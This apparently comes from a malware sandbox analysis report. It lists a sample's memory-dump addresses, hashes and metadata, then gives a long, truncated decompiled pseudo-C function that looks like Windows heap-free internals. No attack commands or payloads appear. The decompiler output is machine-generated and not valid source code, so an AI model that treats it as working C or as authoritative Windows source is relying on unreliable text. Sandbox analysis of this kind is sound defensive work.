                                                                                                                              0x1d74c23b
                                                                                                                              0x1d74c241
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74c241
                                                                                                                              0x1d74c235
                                                                                                                              0x1d74c187
                                                                                                                              0x1d74c19b
                                                                                                                              0x1d74c1a1
                                                                                                                              0x1d74c1a6
                                                                                                                              0x1d74c1ac
                                                                                                                              0x1d74c1b1
                                                                                                                              0x1d7a3a71
                                                                                                                              0x1d7a3a76
                                                                                                                              0x1d7a3a7c
                                                                                                                              0x1d7a3a7e
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3a84
                                                                                                                              0x1d7a3a9d
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3a9d
                                                                                                                              0x00000000
                                                                                                                              0x1d74c1b7
                                                                                                                              0x1d74c1b7
                                                                                                                              0x1d74c1b7
                                                                                                                              0x1d74c1b7
                                                                                                                              0x1d74c1bd
                                                                                                                              0x1d74c1bd
                                                                                                                              0x1d74c1c4
                                                                                                                              0x1d7a3ab0
                                                                                                                              0x1d7a3ab5
                                                                                                                              0x1d7a3ab7
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3abd
                                                                                                                              0x1d7a3af4
                                                                                                                              0x1d7a3af6
                                                                                                                              0x1d7a3afc
                                                                                                                              0x1d7a3afe
                                                                                                                              0x1d7a3b18
                                                                                                                              0x1d7a3b1e
                                                                                                                              0x1d7a3b3c
                                                                                                                              0x1d7a3b3c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3b00
                                                                                                                              0x1d7a3b0e
                                                                                                                              0x1d7a3b0e
                                                                                                                              0x1d7a3afe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74c1c4
                                                                                                                              0x1d74c114
                                                                                                                              0x1d74c11a
                                                                                                                              0x1d74c125
                                                                                                                              0x1d74c140
                                                                                                                              0x1d74c145
                                                                                                                              0x1d74c147
                                                                                                                              0x1d7a3a56
                                                                                                                              0x1d7a3c10
                                                                                                                              0x1d7a3c10
                                                                                                                              0x1d74c14d
                                                                                                                              0x1d74c15b
                                                                                                                              0x1d74c16c
                                                                                                                              0x00000000
                                                                                                                              0x1d74c16c
                                                                                                                              0x1d74c147
                                                                                                                              0x1d74c112
                                                                                                                              0x1d74c0f7
                                                                                                                              0x1d74c0d2
                                                                                                                              0x1d74c068
                                                                                                                              0x1d74c038
                                                                                                                              0x1d74c247
                                                                                                                              0x1d74c247
                                                                                                                              0x1d74c24e
                                                                                                                              0x1d74c465
                                                                                                                              0x1d74c465
                                                                                                                              0x1d74c254
                                                                                                                              0x1d74c256
                                                                                                                              0x1d74c471
                                                                                                                              0x1d74c477
                                                                                                                              0x1d7a3c1b
                                                                                                                              0x1d7a3c1b
                                                                                                                              0x1d74c47d
                                                                                                                              0x1d74c47d
                                                                                                                              0x1d74c483
                                                                                                                              0x00000000
                                                                                                                              0x1d74c489
                                                                                                                              0x1d74c489
                                                                                                                              0x1d74c48f
                                                                                                                              0x00000000
                                                                                                                              0x1d74c495
                                                                                                                              0x00000000
                                                                                                                              0x1d74c495
                                                                                                                              0x1d74c48f
                                                                                                                              0x1d74c483
                                                                                                                              0x1d74c25c
                                                                                                                              0x1d74c25c
                                                                                                                              0x1d74c25c
                                                                                                                              0x1d74c25c
                                                                                                                              0x00000000
                                                                                                                              0x1d74c256
                                                                                                                              0x1d74bf91
                                                                                                                              0x1d74bef2
                                                                                                                              0x1d74bef2
                                                                                                                              0x1d74bef5
                                                                                                                              0x1d74bef7
                                                                                                                              0x1d74beff
                                                                                                                              0x1d74bf07
                                                                                                                              0x1d74bf07
                                                                                                                              0x1d74bf09
                                                                                                                              0x1d74bf0f
                                                                                                                              0x1d74bf16
                                                                                                                              0x1d74bf18
                                                                                                                              0x1d74bf1b
                                                                                                                              0x1d74bf27
                                                                                                                              0x1d74bf27
                                                                                                                              0x1d74bef0
                                                                                                                              0x1d74bee8
                                                                                                                              0x1d74becd
                                                                                                                              0x1d74bebf
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$.mui$.mun$SystemResources\
                                                                                                                              • API String ID: 0-3047833772
                                                                                                                              • Opcode ID: 79bfeca40d02c0ed0c21b2d1687f988900221e109a64e663589c68e983a8d5f1
                                                                                                                              • Instruction ID: 6cf82d48120489070bc58398f8d427fc91132f609cb86019f11affc118073c78
                                                                                                                              • Opcode Fuzzy Hash: 79bfeca40d02c0ed0c21b2d1687f988900221e109a64e663589c68e983a8d5f1
                                                                                                                              • Instruction Fuzzy Hash: 6C623C72A043699FCB22CF54CC44BE9B7B8BF0A620F1581EAD509A7650D771AE84CF53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D753C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E1D753C60(signed char __ecx, signed int _a4, intOrPtr _a8) {
				signed short _v8;
				signed int _v12;
				char _v20;
				signed char _v32;
				signed int _v36;
				char _v37;
				char _v38;
				signed int _v44;
				signed short _v48;
				signed char _v52;
				signed char _v56;
				char _v60;
				short _v64;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				char _v86;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed short* _v104;
				signed char _v105;
				signed short _v108;
				signed short _v110;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed short _v128;
				signed short _v132;
				signed short _v136;
				signed int _v140;
				signed int _v144;
				signed short _v148;
				unsigned int _v152;
				signed short _v156;
				signed int _v160;
				signed int _v164;
				signed short _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				unsigned int* _v200;
				signed int _v204;
				signed int _v208;
				signed short _v212;
				signed char _v216;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				unsigned int _v276;
				unsigned int _v284;
				signed short _v292;
				signed short _v300;
				signed int _v308;
				signed short _v316;
				signed short _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t686;
				signed int _t692;
				signed char* _t693;
				signed char _t694;
				void* _t697;
				signed int _t700;
				char* _t701;
				signed int _t704;
				signed char* _t705;
				signed int _t706;
				signed char* _t707;
				signed int _t709;
				signed int _t712;
				signed char* _t713;
				intOrPtr _t722;
				signed int _t723;
				signed char* _t724;
				signed int _t738;
				signed int _t743;
				intOrPtr* _t760;
				signed char _t761;
				signed int* _t768;
				signed int _t777;
				signed int* _t778;
				signed int _t782;
				intOrPtr _t788;
				intOrPtr _t790;
				signed char _t798;
				intOrPtr _t801;
				signed short* _t802;
				signed int* _t805;
				unsigned int* _t812;
				signed int _t815;
				signed int _t817;
				signed int _t820;
				signed int _t842;
				signed char _t853;
				signed short _t854;
				void* _t855;
				signed short* _t858;
				signed int _t861;
				signed int _t865;
				intOrPtr _t871;
				signed int _t875;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed char _t882;
				signed int _t884;
				signed char _t885;
				intOrPtr* _t897;
				intOrPtr* _t900;
				signed int _t903;
				intOrPtr _t909;
				signed int _t913;
				signed int _t919;
				signed int _t923;
				signed char _t930;
				intOrPtr* _t931;
				intOrPtr _t932;
				signed int _t935;
				signed int _t941;
				intOrPtr _t947;
				signed int _t951;
				signed int _t954;
				signed int _t955;
				signed char _t957;
				signed short _t959;
				signed char _t960;
				signed char _t961;
				unsigned int _t968;
				signed char _t970;
				signed int _t979;
				signed int _t980;
				signed char _t984;
				signed int _t986;
				signed int _t987;
				signed int _t988;
				signed int _t998;
				intOrPtr _t1009;
				void* _t1015;
				void* _t1018;
				signed int _t1019;
				signed int _t1020;
				signed short _t1023;
				signed int _t1025;
				signed short _t1026;
				signed int _t1027;
				unsigned int _t1030;
				signed short _t1033;
				signed int _t1034;
				unsigned int _t1038;
				signed char _t1045;
				signed char _t1047;
				signed int _t1050;
				signed short _t1051;
				signed int _t1053;
				intOrPtr _t1056;
				signed int _t1058;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1069;
				signed int _t1071;
				signed int _t1087;
				signed short* _t1088;
				intOrPtr _t1089;
				signed int _t1091;
				signed short _t1092;
				signed char _t1093;
				signed short _t1095;
				signed int _t1096;
				intOrPtr _t1097;
				intOrPtr* _t1110;
				intOrPtr _t1111;
				signed char _t1113;
				intOrPtr _t1114;
				signed int _t1119;
				signed char _t1124;
				signed int _t1131;
				signed int _t1132;
				intOrPtr _t1133;
				intOrPtr* _t1135;
				signed char _t1136;
				signed short _t1138;
				intOrPtr _t1140;
				signed int _t1146;
				signed int _t1150;
				signed short _t1152;
				signed int _t1154;
				signed int _t1160;
				signed char _t1164;
				signed char _t1166;
				intOrPtr _t1169;
				signed short* _t1173;
				signed char _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1187;
				signed int _t1188;
				void* _t1189;
				signed int _t1191;
				signed short _t1195;
				signed int _t1196;
				signed int _t1197;
				intOrPtr* _t1199;
				signed int* _t1202;
				intOrPtr _t1203;
				signed int _t1205;
				signed short _t1214;
				signed int _t1215;
				signed int _t1217;
				signed int _t1219;
				intOrPtr* _t1224;
				intOrPtr _t1226;
				signed int _t1228;
				unsigned int _t1232;
				signed int _t1238;
				signed int _t1239;
				signed int _t1240;
				unsigned int _t1242;
				signed short _t1247;
				signed int _t1249;
				unsigned int _t1252;
				intOrPtr* _t1255;
				signed int _t1257;
				unsigned int _t1267;
				signed int _t1270;
				signed char _t1271;
				signed int _t1274;
				signed int _t1275;
				signed int _t1286;
				signed char _t1287;
				signed int _t1288;
				void* _t1290;
				signed int _t1291;
				signed int _t1292;
				signed char _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1298;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed short* _t1304;
				signed short _t1305;
				signed int _t1308;
				signed int _t1309;
				intOrPtr _t1310;
				signed int _t1311;
				signed short _t1312;
				signed short _t1314;
				signed short _t1317;
				intOrPtr _t1318;
				signed int _t1319;
				signed int _t1322;
				void* _t1323;
				void* _t1324;
				void* _t1327;
				void* _t1328;

				_t1037 = __ecx;
				_push(0xfffffffe);
				_push(0x1d81c1a8);
				_push(E1D78AD20);
				_push( *[fs:0x0]);
				_t1324 = _t1323 - 0x130;
				_push(_t1018);
				_t686 =  *0x1d83b370;
				_v12 = _v12 ^ _t686;
				_push(_t686 ^ _t1322);
				 *[fs:0x0] =  &_v20;
				_t1280 = __ecx;
				_v216 = __ecx;
				_v37 = 1;
				_v38 = 0;
				_v136 = 0;
				_v156 = 1;
				_v92 = 0;
				_v116 = 0;
				_v148 = 0;
				_v64 = 0;
				_t690 = _a4;
				if(__ecx != _a4) {
					_t1188 = _t1187 |  *(__ecx + 0x44);
					_v56 = _t1188;
					__eflags = _t1188 & 0x7d010f60;
					if((_t1188 & 0x7d010f60) == 0) {
						_t1285 = 3;
						L7:
						_t692 =  *( *[fs:0x30] + 0x50);
						__eflags = _t692;
						if(_t692 == 0) {
							L10:
							_t693 = 0x7ffe0380;
						} else {
							__eflags =  *_t692;
							if( *_t692 == 0) {
								goto L10;
							} else {
								_t693 =  *( *[fs:0x30] + 0x50) + 0x226;
							}
						}
						__eflags =  *_t693;
						if( *_t693 == 0) {
							L15:
							_t1019 = _a4;
						} else {
							_t1009 =  *[fs:0x30];
							__eflags =  *(_t1009 + 0x240) & 0x00000001;
							if(( *(_t1009 + 0x240) & 0x00000001) == 0) {
								goto L15;
							} else {
								_t1019 = _a4;
								_t1037 =  *(_t1280 + 0x4c) >> 0x00000011 &  *(_t1280 + 0x52) & 0x000000ff ^  *(_t1019 + 2) & 0x000000ff;
								__eflags = _t1037 & 0x00000008;
								if((_t1037 & 0x00000008) == 0) {
									_t1037 = _t1280;
									E1D7FF247(_t1037, _a8, _t1285);
									_t1188 = _v56;
								}
							}
						}
						_v8 = 0;
						__eflags = _t1188 & 0x00000001;
						if(__eflags != 0) {
							__eflags =  *(_t1280 + 0x4c);
							if( *(_t1280 + 0x4c) != 0) {
								 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
								__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
								if(__eflags != 0) {
									_push(_t1037);
									E1D7FD646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
								}
							}
							L42:
							_t1286 = _t1019 + 2;
							_t694 =  *_t1286;
							__eflags = _t694 & 0x00000008;
							if((_t694 & 0x00000008) != 0) {
								_t988 = _t694 & 0x000000f7;
								__eflags = _t988;
								 *_t1286 = _t988;
							}
							__eflags =  *((char*)(_t1019 + 7)) - 4;
							if( *((char*)(_t1019 + 7)) == 4) {
								_t1020 = _t1019 + 0xffffffe8;
								_v92 = _t1020;
								_t1038 =  *(_t1020 + 0x10);
								_v152 = _t1038;
								_v116 = _t1020 & 0xffff0000;
								 *((intOrPtr*)(_t1280 + 0x200)) =  *((intOrPtr*)(_t1280 + 0x200)) - _t1038;
								_t697 =  *_t1020;
								_t1039 =  *(_t1020 + 4);
								_t1189 =  *_t1039;
								_t1287 =  *(_t697 + 4);
								__eflags = _t1189 - _t1287;
								if(_t1189 != _t1287) {
									L320:
									__eflags = 0;
									_t1039 = 0xd;
									E1D805FED(0xd, 0, _t1020, _t1287, _t1189, 0);
								} else {
									__eflags = _t1189 - _t1020;
									if(_t1189 != _t1020) {
										goto L320;
									} else {
										 *_t1039 = _t697;
										 *(_t697 + 4) = _t1039;
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t738 =  *( *[fs:0x30] + 0x68);
									_v260 = _t738;
									__eflags = _t738 & 0x00000800;
									if((_t738 & 0x00000800) != 0) {
										__eflags =  *(_t1020 + 0x10) >> 3;
										_t1039 = _t1280;
										E1D7E9AFE(_t1280,  *((intOrPtr*)(_v92 + 0xa)),  *(_t1020 + 0x10) >> 3, 0, 3);
									}
								}
								_t1288 = 0;
								_a4 = 0;
								__eflags = _v38;
								if(_v38 != 0) {
									_push( *(_t1280 + 0xc8));
									E1D74E740(_t1039);
									_v38 = 0;
								}
								_t1021 =  *(_v92 + 0x14);
								_v148 =  *(_v92 + 0x14);
								_t700 = E1D753C40();
								__eflags = _t700;
								if(_t700 == 0) {
									_t701 = 0x7ffe0388;
								} else {
									_t701 =  *( *[fs:0x30] + 0x50) + 0x22e;
									_t1288 = _a4;
									_t1021 = _v148;
								}
								__eflags =  *_t701;
								if( *_t701 != 0) {
									E1D7FDA30(_t1021, _t1280, _v116, _t1021);
								}
								_v48 = 0;
								_t1191 =  &_v116;
								_v264 = E1D73FABA(_t1191,  &_v48, 0x8000);
								_t704 = E1D753C40();
								__eflags = _t704;
								if(_t704 == 0) {
									_t705 = 0x7ffe0380;
								} else {
									_t705 =  *( *[fs:0x30] + 0x50) + 0x226;
									_t1288 = _a4;
								}
								__eflags =  *_t705;
								if( *_t705 != 0) {
									_t722 =  *[fs:0x30];
									__eflags =  *(_t722 + 0x240) & 0x00000001;
									if(( *(_t722 + 0x240) & 0x00000001) != 0) {
										_t723 = E1D753C40();
										__eflags = _t723;
										if(_t723 == 0) {
											_t724 = 0x7ffe0380;
										} else {
											_t724 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
										__eflags =  *(_t1280 + 0x74) << 3;
										_t1191 = _v92;
										E1D7FF058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t724 & 0x000000ff);
									}
									_t1288 = _a4;
								}
								_t706 = E1D753C40();
								__eflags = _t706;
								if(_t706 == 0) {
									_t707 = 0x7ffe038a;
								} else {
									_t707 =  *( *[fs:0x30] + 0x50) + 0x230;
									_t1288 = _a4;
								}
								__eflags =  *_t707;
								if( *_t707 != 0) {
									_t712 = E1D753C40();
									__eflags = _t712;
									if(_t712 == 0) {
										_t713 = 0x7ffe038a;
									} else {
										_t713 =  *( *[fs:0x30] + 0x50) + 0x230;
										_t1288 = _a4;
									}
									__eflags =  *(_t1280 + 0x74) << 3;
									_t1191 = _v92;
									E1D7FF058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t713 & 0x000000ff);
								}
								_t709 = _v48 >> 3;
								__eflags = _t709;
								_v212 = _t709;
								goto L350;
							} else {
								_t743 =  *_t1019 & 0x0000ffff;
								__eflags = _t743 -  *((intOrPtr*)(_t1280 + 0xf0));
								if(_t743 <  *((intOrPtr*)(_t1280 + 0xf0))) {
									_t1271 =  *((intOrPtr*)((_t743 >> 3) + _t1280 + 0xf2));
									_t984 = 1 << (_t743 & 0x00000007);
									_t1019 = _a4;
									__eflags = _t1271 & _t984;
									if((_t1271 & _t984) == 0) {
										_t1173 =  *((intOrPtr*)(_t1280 + 0xec)) + ( *_t1019 & 0x0000ffff) * 2;
										_t986 =  *_t1173 & 0x0000ffff;
										__eflags = _t986 - 1;
										if(_t986 > 1) {
											_t987 = _t986 - 1;
											__eflags = _t987;
											 *_t1173 = _t987;
										}
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t979 =  *( *[fs:0x30] + 0x68);
									_v228 = _t979;
									_t1019 = _a4;
									__eflags = _t979 & 0x00000800;
									if((_t979 & 0x00000800) != 0) {
										_push(2);
										_push(0);
										__eflags =  *_t1286 & 0x00000002;
										if(( *_t1286 & 0x00000002) == 0) {
											_t1166 =  *(_t1019 + 3);
											_v105 = _t1166;
											_t980 =  *_t1019 & 0x0000ffff;
											_t1270 = _t1166 & 0x000000ff;
										} else {
											_t980 =  *_t1019 & 0x0000ffff;
											_t1169 = _t1019 - 8 + _t980 * 8;
											_v232 = _t1169;
											_t1270 =  *((intOrPtr*)(_t1169 + 2));
										}
										_push(_t980);
										_v64 = E1D7E9AFE(_t1280, _t1270);
									}
								}
								_t1195 =  *_t1019 & 0x0000ffff;
								_v48 = _t1195;
								_v212 = _t1195;
								__eflags =  *(_t1280 + 0x40) & 0x00000080;
								if(( *(_t1280 + 0x40) & 0x00000080) == 0) {
									_v60 = 0;
									_v176 = _t1019;
									_t1300 = _t1019 - (( *(_t1280 + 0x54) & 0x0000ffff ^  *(_t1019 + 4) & 0x0000ffff) << 3);
									_v44 = _t1300;
									__eflags = _t1300 - _t1019;
									if(_t1300 != _t1019) {
										_t1131 =  *(_t1280 + 0x4c);
										_t930 = _t1131 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1300 + 2);
										__eflags = _t930 & 0x00000001;
										if((_t930 & 0x00000001) == 0) {
											__eflags = _t1131;
											if(_t1131 != 0) {
												_t1267 =  *(_t1280 + 0x50) ^  *_t1300;
												 *_t1300 = _t1267;
												_t1164 = _t1267 >> 0x00000010 ^ _t1267 >> 0x00000008 ^ _t1267;
												__eflags = _t1267 >> 0x18 - _t1164;
												if(__eflags != 0) {
													_push(_t1164);
													E1D7FD646(_t1019, _t1280, _t1300, _t1280, _t1300, __eflags);
												}
											}
											_t1255 = _t1300 + 8;
											_v104 = _t1255;
											_t1132 =  *_t1255;
											_v96 = _t1132;
											_t931 =  *((intOrPtr*)(_t1300 + 0xc));
											_v72 = _t931;
											_t932 =  *_t931;
											_t1133 =  *((intOrPtr*)(_t1132 + 4));
											__eflags = _t932 - _t1133;
											if(_t932 != _t1133) {
												L105:
												E1D805FED(0xd, _t1280, _t1255, _t1133, _t932, 0);
											} else {
												__eflags = _t932 - _t1255;
												if(_t932 != _t1255) {
													goto L105;
												} else {
													 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1300 & 0x0000ffff);
													_t1257 =  *(_t1280 + 0xb4);
													_v32 = _t1257;
													__eflags = _t1257;
													if(_t1257 != 0) {
														_t954 =  *_t1300 & 0x0000ffff;
														_v120 = _t954;
														while(1) {
															__eflags = _t954 -  *(_t1257 + 4);
															if(_t954 <  *(_t1257 + 4)) {
																break;
															}
															_t1160 =  *_t1257;
															__eflags = _t1160;
															if(_t1160 != 0) {
																_t1257 = _t1160;
																_v32 = _t1257;
																continue;
															} else {
																_t954 =  *(_t1257 + 4) - 1;
																__eflags = _t954;
															}
															break;
														}
														_v164 = _t954;
														_v52 = _t954;
														_t1146 = _t954 -  *((intOrPtr*)(_t1257 + 0x14));
														_v80 = _t1146;
														__eflags =  *(_t1257 + 8);
														_t955 = _t1146 + _t1146;
														if( *(_t1257 + 8) == 0) {
															_t955 = _t1146;
														}
														_t1311 = _t955 * 4;
														_v84 = _t1311;
														_t957 =  *((intOrPtr*)(_t1257 + 0x20)) + _t1311;
														_v56 = _t957;
														_v188 =  *_t957;
														 *((intOrPtr*)(_t1257 + 0xc)) =  *((intOrPtr*)(_t1257 + 0xc)) - 1;
														_t959 =  *(_t1257 + 4);
														_v36 = _t959;
														_t1312 = _t959 - 1;
														_v128 = _t1312;
														_t960 = _v52;
														__eflags = _t960 - _t1312;
														_t1300 = _v44;
														if(_t960 == _t1312) {
															_t168 = _t1257 + 0x10;
															 *_t168 =  *(_t1257 + 0x10) - 1;
															__eflags =  *_t168;
														}
														_t170 = _t1300 + 8; // 0x1d78ad28
														__eflags = _v188 - _t170;
														if(_v188 == _t170) {
															_v168 =  *(_t1257 + 4);
															__eflags =  *_t1257;
															if( *_t1257 == 0) {
																_t1317 = _v128;
																_v36 = _t1317;
																_v168 = _t1317;
															}
															_t1314 =  *_v104;
															_v104 =  *((intOrPtr*)(_t1257 + 0x18));
															__eflags = _t960 - _v36;
															_t1150 = _v80;
															if(_t960 >= _v36) {
																_t961 = _v56;
																__eflags = _t1314 - _v104;
																if(_t1314 == _v104) {
																	 *_t961 = 0;
																	goto L89;
																} else {
																	 *_t961 = _t1314;
																	goto L83;
																}
																goto L106;
															} else {
																__eflags = _t1314 -  *((intOrPtr*)(_t1257 + 0x18));
																if(_t1314 ==  *((intOrPtr*)(_t1257 + 0x18))) {
																	L88:
																	 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = 0;
																	L89:
																	 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) &  !(1 << (_t1150 & 0x0000001f));
																} else {
																	_t1152 =  *(_t1314 - 8);
																	_v276 = _t1152;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t968 =  *(_t1280 + 0x50) ^ _t1152;
																		_v36 = _t968;
																		_v276 = _t968;
																		_t970 = _v36;
																		__eflags = _t970 >> 0x18 - (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970);
																		if(_t970 >> 0x18 != (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970)) {
																			E1D805FED(3, _t1280, _t1314 - 8, 0, 0, 0);
																			_t1257 = _v32;
																		}
																		_t1152 = _v36;
																	}
																	_t1154 = _v120 - (_t1152 & 0x0000ffff);
																	__eflags = _t1154;
																	_v236 = _t1154;
																	if(_t1154 != 0) {
																		_t1150 = _v80;
																		goto L88;
																	} else {
																		 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = _t1314;
																	}
																}
															}
															L83:
															_t1300 = _v44;
														}
													}
													_t935 = _v96;
													_t1135 = _v72;
													 *_t1135 = _t935;
													 *((intOrPtr*)(_t935 + 4)) = _t1135;
													__eflags =  *(_t1300 + 2) & 0x00000008;
													if(( *(_t1300 + 2) & 0x00000008) == 0) {
														L94:
														_t1136 =  *(_t1300 + 2);
														__eflags = _t1136 & 0x00000004;
														if((_t1136 & 0x00000004) != 0) {
															_t1034 = ( *_t1300 & 0x0000ffff) * 8 - 0x10;
															_v172 = _t1034;
															__eflags = _t1136 & 0x00000002;
															if((_t1136 & 0x00000002) != 0) {
																__eflags = _t1034 - 4;
																if(_t1034 > 4) {
																	_t1034 = _t1034 - 4;
																	__eflags = _t1034;
																	_v172 = _t1034;
																}
															}
															_t941 = E1D7980A0(_t1300 + 0x10, _t1034, 0xfeeefeee);
															_v72 = _t941;
															__eflags = _t941 - _t1034;
															if(_t941 != _t1034) {
																_t1140 =  *[fs:0x30];
																__eflags =  *(_t1140 + 0xc);
																if( *(_t1140 + 0xc) == 0) {
																	_push("HEAP: ");
																	E1D73B910();
																	_t1328 = _t1324 + 4;
																} else {
																	E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	_t1328 = _t1324 + 8;
																}
																_push(_v72 + 0x10 + _t1300);
																E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1300);
																_t1324 = _t1328 + 0xc;
																_t947 =  *[fs:0x30];
																__eflags =  *((char*)(_t947 + 2));
																if( *((char*)(_t947 + 2)) != 0) {
																	 *0x1d8347a1 = 1;
																	 *0x1d834100 = _t1300;
																	asm("int3");
																	 *0x1d8347a1 = 0;
																}
															}
														}
														 *(_t1300 + 2) = 0;
														 *((char*)(_t1300 + 7)) = 0;
														_t1019 = _t1300;
														_v176 = _t1019;
														_t1138 = _v48 + ( *_t1300 & 0x0000ffff);
														_v48 = _t1138;
														 *_t1300 = _t1138;
														 *(_t1300 + 4 + _v48 * 8) =  *(_t1280 + 0x54) ^ _v48;
													} else {
														_t951 = E1D73F5C7(_t1280, _t1300);
														__eflags = _t951;
														if(_t951 != 0) {
															goto L94;
														} else {
															E1D73F113(_t1280, _t1300,  *_t1300 & 0x0000ffff, 1);
														}
													}
												}
											}
											L106:
											_t1195 = _v48;
										}
									}
									_t1286 = _t1019 + _t1195 * 8;
									_v36 = _t1286;
									__eflags =  *(_t1280 + 0x4c);
									if( *(_t1280 + 0x4c) == 0) {
										L111:
										_v86 = 1;
									} else {
										_t923 =  *_t1286;
										_v284 = _t923;
										_t1252 =  *(_t1280 + 0x50) ^ _t923;
										_v284 = _t1252;
										__eflags = _t1252 >> 0x18 - (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252);
										if(_t1252 >> 0x18 == (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252)) {
											_t1195 = _v48;
											goto L111;
										} else {
											_v86 = 0;
											E1D805FED(3, _t1280, _t1286, 0, 0, 0);
											_t1195 = _v48;
											while(1) {
												L112:
												_t1087 =  *(_t1280 + 0x4c);
												_t853 = _t1087 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1286 + 2);
												__eflags = _t853 & 0x00000001;
												if((_t853 & 0x00000001) != 0) {
													break;
												}
												__eflags = _t1087;
												if(_t1087 != 0) {
													_t1232 =  *(_t1280 + 0x50) ^  *_t1286;
													 *_t1286 = _t1232;
													_t1124 = _t1232 >> 0x00000010 ^ _t1232 >> 0x00000008 ^ _t1232;
													__eflags = _t1232 >> 0x18 - _t1124;
													if(__eflags != 0) {
														_push(_t1124);
														E1D7FD646(_t1019, _t1280, _t1286, _t1280, _t1286, __eflags);
													}
												}
												__eflags = _v60;
												if(_v60 != 0) {
													_t897 = _t1019 + 8;
													_t1308 =  *_t897;
													_v72 = _t1308;
													_t1110 =  *((intOrPtr*)(_t1019 + 0xc));
													_v96 = _t1110;
													_t1111 =  *_t1110;
													_t1226 =  *((intOrPtr*)(_t1308 + 4));
													__eflags = _t1111 - _t1226;
													if(_t1111 != _t1226) {
														L139:
														E1D805FED(0xd, _t1280, _t897, _t1226, _t1111, 0);
													} else {
														__eflags = _t1111 - _t897;
														if(_t1111 != _t897) {
															goto L139;
														} else {
															 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1019 & 0x0000ffff);
															_t1228 =  *(_t1280 + 0xb4);
															__eflags = _t1228;
															if(_t1228 != 0) {
																_t1119 =  *_t1019 & 0x0000ffff;
																while(1) {
																	_t1310 =  *((intOrPtr*)(_t1228 + 4));
																	__eflags = _t1119 - _t1310;
																	if(_t1119 < _t1310) {
																		break;
																	}
																	_t919 =  *_t1228;
																	__eflags = _t919;
																	if(_t919 != 0) {
																		_t1228 = _t919;
																		continue;
																	} else {
																		_t1119 = _t1310 - 1;
																	}
																	break;
																}
																_v180 = _t1119;
																E1D75036A(_t1280, _t1228, 1, _t1019 + 8, _t1119,  *_t1019 & 0x0000ffff);
																_t1308 = _v72;
															}
															_t900 = _v96;
															 *_t900 = _t1308;
															 *((intOrPtr*)(_t1308 + 4)) = _t900;
															__eflags =  *(_t1019 + 2) & 0x00000008;
															if(( *(_t1019 + 2) & 0x00000008) == 0) {
																L129:
																_t1113 =  *(_t1019 + 2);
																__eflags = _t1113 & 0x00000004;
																if((_t1113 & 0x00000004) != 0) {
																	_t1309 = ( *_t1019 & 0x0000ffff) * 8 - 0x10;
																	_v184 = _t1309;
																	__eflags = _t1113 & 0x00000002;
																	if((_t1113 & 0x00000002) != 0) {
																		__eflags = _t1309 - 4;
																		if(_t1309 > 4) {
																			_t1309 = _t1309 - 4;
